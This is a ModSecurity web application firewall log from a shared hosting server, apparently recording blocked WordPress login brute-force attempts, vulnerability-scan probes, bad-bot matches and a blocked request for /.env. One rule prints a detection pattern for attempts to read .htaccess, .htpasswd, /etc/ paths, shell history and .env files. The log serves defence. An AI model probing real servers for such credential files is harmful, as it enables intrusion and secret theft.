[Tue May 26 19:39:20.146998 2026] [security2:error] [pid 70836:tid 71003] [client 45.81.136.186:42193] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahWpj-_FvbQ_BhqVMRV-EwAAAKo"], referer: https://www.yourstorybag.com/what-kind-of-questions-do-you-ask-when-you-tell-stories-to-children/
[Tue May 26 19:39:22.793824 2026] [security2:error] [pid 70836:tid 70981] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpku_FvbQ_BhqVMRV-ZgAAAJQ"]
[Tue May 26 19:39:24.300077 2026] [security2:error] [pid 70836:tid 71061] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpk-_FvbQ_BhqVMRV-oQAAAOQ"]
[Tue May 26 19:39:24.776263 2026] [security2:error] [pid 70836:tid 70936] [remote 14.161.17.36:49110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWplO_FvbQ_BhqVMRV-tAAAj2M"]
[Tue May 26 19:39:26.011322 2026] [security2:error] [pid 70836:tid 70980] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWple_FvbQ_BhqVMRV-0wAAAJM"]
[Tue May 26 19:39:26.453495 2026] [security2:error] [pid 70836:tid 71008] [client 104.28.157.147:9260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.157.28.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "amdsi.org.in"] [uri "/wp-login.php"] [unique_id "ahWplu_FvbQ_BhqVMRV-5gAAAK8"]
[Tue May 26 19:39:29.076280 2026] [security2:error] [pid 70836:tid 71074] [client 31.57.184.107:63524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/wp-login.php"] [unique_id "ahWpmO_FvbQ_BhqVMRV_SQAAAPE"], referer: https://www.facebook.com/
[Tue May 26 19:39:29.094853 2026] [security2:error] [pid 70836:tid 71036] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpmO_FvbQ_BhqVMRV_QgAAAMs"]
[Tue May 26 19:39:30.625275 2026] [security2:error] [pid 70836:tid 71069] [client 87.106.152.203:56819] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.acacia.org.in"] [uri "/images/images/cache.php"] [unique_id "ahWpmu_FvbQ_BhqVMRV_nQAAAOw"], referer: www.google.com
[Tue May 26 19:39:31.343886 2026] [security2:error] [pid 70836:tid 71073] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpmu_FvbQ_BhqVMRV_rAAAAPA"]
[Tue May 26 19:39:31.373608 2026] [security2:error] [pid 70836:tid 71000] [client 176.65.139.233:52206] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "la10.cti.hn"] [uri "/.env"] [unique_id "ahWpm-_FvbQ_BhqVMRV_uQAAAKc"]
[Tue May 26 19:39:32.544596 2026] [security2:error] [pid 70836:tid 70896] [remote 113.190.40.93:59578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWpnO_FvbQ_BhqVMRV_2wAA7Ds"]
[Tue May 26 19:39:33.010048 2026] [security2:error] [pid 70836:tid 71074] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpnO_FvbQ_BhqVMRV_5wAAAPE"]
[Tue May 26 19:39:35.915369 2026] [security2:error] [pid 70836:tid 71014] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpn-_FvbQ_BhqVMRWASQAAALU"]
[Tue May 26 19:39:36.303064 2026] [security2:error] [pid 70836:tid 71069] [client 113.163.252.121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpn-_FvbQ_BhqVMRWATwAAAOw"]
[Tue May 26 19:39:38.263948 2026] [security2:error] [pid 70836:tid 71033] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpoe_FvbQ_BhqVMRWAmAAAAMg"]
[Tue May 26 19:39:40.816272 2026] [security2:error] [pid 70836:tid 71002] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWppO_FvbQ_BhqVMRWA-AAAAKk"]
[Tue May 26 19:39:42.339438 2026] [security2:error] [pid 70836:tid 70934] [remote 54.36.102.244:46406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWppu_FvbQ_BhqVMRWBMgAAuGE"]
[Tue May 26 19:39:42.836073 2026] [security2:error] [pid 70836:tid 71034] [client 87.106.152.203:60944] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.acacia.org.in"] [uri "/images/images/cache.php"] [unique_id "ahWppu_FvbQ_BhqVMRWBTgAAAMk"], referer: www.google.com
[Tue May 26 19:39:43.149926 2026] [security2:error] [pid 70836:tid 71039] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWppu_FvbQ_BhqVMRWBRAAAAM4"]
[Tue May 26 19:39:45.253039 2026] [security2:error] [pid 70836:tid 71053] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpqO_FvbQ_BhqVMRWBjwAAANw"]
[Tue May 26 19:39:47.246746 2026] [security2:error] [pid 70836:tid 71076] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpqu_FvbQ_BhqVMRWB2AAAAPM"]
[Tue May 26 19:39:47.527169 2026] [security2:error] [pid 70836:tid 70916] [remote 185.190.18.72:53744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.18.190.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpq-_FvbQ_BhqVMRWB7gAAjU8"]
[Tue May 26 19:39:48.181862 2026] [security2:error] [pid 70836:tid 70954] [remote 185.190.18.72:53744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.18.190.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWprO_FvbQ_BhqVMRWCRgAAwXU"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:39:49.706236 2026] [security2:error] [pid 70836:tid 70987] [client 43.173.175.241:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWpre_FvbQ_BhqVMRWCbwAAAJo"]
[Tue May 26 19:39:49.714068 2026] [security2:error] [pid 70836:tid 70983] [client 43.172.195.115:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWpre_FvbQ_BhqVMRWCcwAAAJY"]
[Tue May 26 19:39:49.913405 2026] [security2:error] [pid 70836:tid 71041] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpre_FvbQ_BhqVMRWCggAAANA"]
[Tue May 26 19:39:50.853304 2026] [security2:error] [pid 70836:tid 70865] [remote 213.171.208.232:45290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpru_FvbQ_BhqVMRWCsAAArBw"]
[Tue May 26 19:39:50.915394 2026] [security2:error] [pid 70836:tid 71067] [client 104.47.30.126:40417] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cargo-pulse.info"] [uri "/index.html"] [unique_id "ahWpru_FvbQ_BhqVMRWCvQAAAOo"]
[Tue May 26 19:39:51.097580 2026] [security2:error] [pid 70836:tid 70891] [remote 213.171.208.232:45290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpr-_FvbQ_BhqVMRWCwgAAqTY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:39:51.376497 2026] [security2:error] [pid 70836:tid 71031] [client 194.187.176.41:27448] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWpr-_FvbQ_BhqVMRWC2AAAAMY"]
[Tue May 26 19:39:51.820269 2026] [security2:error] [pid 70836:tid 71014] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpr-_FvbQ_BhqVMRWC9wAAALU"]
[Tue May 26 19:39:52.101504 2026] [security2:error] [pid 70836:tid 70913] [remote 143.198.203.76:52130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.203.198.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWpr-_FvbQ_BhqVMRWDEAAAykw"]
[Tue May 26 19:39:52.248645 2026] [security2:error] [pid 70836:tid 71088] [client 194.187.176.90:27462] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWpsO_FvbQ_BhqVMRWDFAAAAP8"]
[Tue May 26 19:39:53.306161 2026] [security2:error] [pid 70836:tid 71006] [client 208.91.198.85:34090] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahWpse_FvbQ_BhqVMRWDTwAAAK0"]
[Tue May 26 19:39:54.825121 2026] [security2:error] [pid 70836:tid 70991] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpsu_FvbQ_BhqVMRWDeAAAAJ4"]
[Tue May 26 19:39:56.236144 2026] [security2:error] [pid 70836:tid 70997] [client 85.208.96.194:50618] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/list/"] [unique_id "ahWptO_FvbQ_BhqVMRWDsAAAAKQ"]
[Tue May 26 19:39:56.236431 2026] [security2:error] [pid 70836:tid 70997] [client 85.208.96.194:50618] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/list/"] [unique_id "ahWptO_FvbQ_BhqVMRWDsAAAAKQ"]
[Tue May 26 19:39:56.310935 2026] [security2:error] [pid 70836:tid 70848] [remote 54.36.102.244:40852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWptO_FvbQ_BhqVMRWDsQAA1Qs"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:39:56.839370 2026] [security2:error] [pid 70836:tid 70975] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWptO_FvbQ_BhqVMRWDtwAAAI4"]
[Tue May 26 19:39:57.201758 2026] [security2:error] [pid 70836:tid 70884] [remote 74.7.241.58:56322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWpte_FvbQ_BhqVMRWD0wAAuC8"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-includes
[Tue May 26 19:39:58.899592 2026] [security2:error] [pid 70836:tid 70844] [remote 94.76.235.103:50226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWptu_FvbQ_BhqVMRWEBwAA-Qc"]
[Tue May 26 19:39:59.450081 2026] [security2:error] [pid 70836:tid 70951] [remote 91.134.89.60:38640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWpt-_FvbQ_BhqVMRWEIAAA33I"]
[Tue May 26 19:39:59.991491 2026] [security2:error] [pid 70836:tid 70920] [remote 94.76.235.103:50226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpt-_FvbQ_BhqVMRWEPgAAiFM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:40:00.525393 2026] [security2:error] [pid 70836:tid 71082] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpuO_FvbQ_BhqVMRWERwAAAPk"]
[Tue May 26 19:40:01.596976 2026] [security2:error] [pid 70836:tid 71015] [client 113.182.143.186:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpue_FvbQ_BhqVMRWEbgAAALY"]
[Tue May 26 19:40:02.010167 2026] [security2:error] [pid 70836:tid 71028] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpue_FvbQ_BhqVMRWEggAAAMM"]
[Tue May 26 19:40:03.519504 2026] [security2:error] [pid 70836:tid 70999] [client 172.224.240.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWpu-_FvbQ_BhqVMRWEygAAAKY"]
[Tue May 26 19:40:04.151601 2026] [security2:error] [pid 70836:tid 71037] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpu-_FvbQ_BhqVMRWE3AAAAMw"]
[Tue May 26 19:40:06.715256 2026] [security2:error] [pid 70836:tid 71051] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpvu_FvbQ_BhqVMRWFPQAAANo"]
[Tue May 26 19:40:09.160947 2026] [security2:error] [pid 70836:tid 70998] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpwO_FvbQ_BhqVMRWFlAAAAKU"]
[Tue May 26 19:40:10.570537 2026] [security2:error] [pid 70836:tid 71046] [client 54.38.147.67:37228] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.alpha-bau.net"] [uri "/robots.txt"] [unique_id "ahWpwu_FvbQ_BhqVMRWF1gAAANU"]
[Tue May 26 19:40:10.570701 2026] [security2:error] [pid 70836:tid 71046] [client 54.38.147.67:37228] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.alpha-bau.net"] [uri "/robots.txt"] [unique_id "ahWpwu_FvbQ_BhqVMRWF1gAAANU"]
[Tue May 26 19:40:10.813387 2026] [security2:error] [pid 70836:tid 71042] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpwu_FvbQ_BhqVMRWF0gAAANE"]
[Tue May 26 19:40:12.335791 2026] [security2:error] [pid 70836:tid 70990] [client 15.235.98.199:42456] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.alpha-bau.net"] [uri "/"] [unique_id "ahWpxO_FvbQ_BhqVMRWGCgAAAJ0"]
[Tue May 26 19:40:12.335930 2026] [security2:error] [pid 70836:tid 70990] [client 15.235.98.199:42456] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.alpha-bau.net"] [uri "/"] [unique_id "ahWpxO_FvbQ_BhqVMRWGCgAAAJ0"]
[Tue May 26 19:40:12.941411 2026] [security2:error] [pid 70836:tid 70991] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpxO_FvbQ_BhqVMRWGEAAAAJ4"]
[Tue May 26 19:40:14.668695 2026] [security2:error] [pid 70836:tid 71004] [client 173.252.82.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.obinnawrites.com"] [uri "/index.php"] [unique_id "ahWpxu_FvbQ_BhqVMRWGQwAAAKs"]
[Tue May 26 19:40:15.872411 2026] [security2:error] [pid 70836:tid 71068] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpx-_FvbQ_BhqVMRWGdQAAAOs"]
[Tue May 26 19:40:16.513165 2026] [security2:error] [pid 70836:tid 70974] [client 147.53.127.82:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpyO_FvbQ_BhqVMRWGkwAAAI0"], referer: https://www.anujtradingco.com/
[Tue May 26 19:40:17.742104 2026] [security2:error] [pid 70836:tid 71011] [client 147.53.127.82:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpye_FvbQ_BhqVMRWGvQAAALI"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 19:40:18.475735 2026] [security2:error] [pid 70836:tid 71034] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpyu_FvbQ_BhqVMRWGxgAAAMk"]
[Tue May 26 19:40:18.577944 2026] [security2:error] [pid 70836:tid 70934] [remote 209.42.20.53:52120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpyu_FvbQ_BhqVMRWG2QAAl2E"]
